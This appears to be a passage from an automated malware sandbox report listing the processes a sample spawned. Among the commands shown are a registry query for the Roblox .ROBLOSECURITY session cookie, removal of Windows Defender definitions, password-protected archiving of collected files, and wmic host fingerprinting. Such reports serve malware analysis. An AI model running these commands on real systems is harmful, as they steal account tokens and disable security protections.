                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:62
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:63
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:64
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:getmac
                                                                                                                                                                                                                                        Imagebase:0x7ff730440000
                                                                                                                                                                                                                                        File size:90'112 bytes
                                                                                                                                                                                                                                        MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:65
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:66
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:67
                                                                                                                                                                                                                                        Start time:16:12:14
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:68
                                                                                                                                                                                                                                        Start time:16:12:14
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
                                                                                                                                                                                                                                        Imagebase:0x7ff6d8210000
                                                                                                                                                                                                                                        File size:2'759'232 bytes
                                                                                                                                                                                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:69
                                                                                                                                                                                                                                        Start time:16:12:14
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:70
                                                                                                                                                                                                                                        Start time:16:12:14
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:71
                                                                                                                                                                                                                                        Start time:16:12:14
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:72
                                                                                                                                                                                                                                        Start time:16:12:14
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
                                                                                                                                                                                                                                        Imagebase:0x7ff653780000
                                                                                                                                                                                                                                        File size:52'744 bytes
                                                                                                                                                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:73
                                                                                                                                                                                                                                        Start time:16:12:15
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:74
                                                                                                                                                                                                                                        Start time:16:12:15
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:75
                                                                                                                                                                                                                                        Start time:16:12:15
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:76
                                                                                                                                                                                                                                        Start time:16:12:15
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:77
                                                                                                                                                                                                                                        Start time:16:12:16
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:78
                                                                                                                                                                                                                                        Start time:16:12:16
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:79
                                                                                                                                                                                                                                        Start time:16:12:17
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                        Imagebase:0x7ff705360000
                                                                                                                                                                                                                                        File size:468'120 bytes
                                                                                                                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:80
                                                                                                                                                                                                                                        Start time:16:12:17
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:81
                                                                                                                                                                                                                                        Start time:16:12:17
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:82
                                                                                                                                                                                                                                        Start time:16:12:17
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:83
                                                                                                                                                                                                                                        Start time:16:12:18
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:84
                                                                                                                                                                                                                                        Start time:16:12:18
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:85
                                                                                                                                                                                                                                        Start time:16:12:18
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:86
                                                                                                                                                                                                                                        Start time:16:12:26
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:87
                                                                                                                                                                                                                                        Start time:16:12:26
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:88
                                                                                                                                                                                                                                        Start time:16:12:26
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
                                                                                                                                                                                                                                        Imagebase:0x7ff713950000
                                                                                                                                                                                                                                        File size:630'736 bytes
                                                                                                                                                                                                                                        MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:89
                                                                                                                                                                                                                                        Start time:16:12:27
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:90
                                                                                                                                                                                                                                        Start time:16:12:27
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:91
                                                                                                                                                                                                                                        Start time:16:12:27
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic os get Caption
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:92
                                                                                                                                                                                                                                        Start time:16:12:28
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:93
                                                                                                                                                                                                                                        Start time:16:12:28
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:94
                                                                                                                                                                                                                                        Start time:16:12:28
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:95
                                                                                                                                                                                                                                        Start time:16:12:29
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:96
                                                                                                                                                                                                                                        Start time:16:12:29
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:97
                                                                                                                                                                                                                                        Start time:16:12:29
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:98
                                                                                                                                                                                                                                        Start time:16:12:30
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
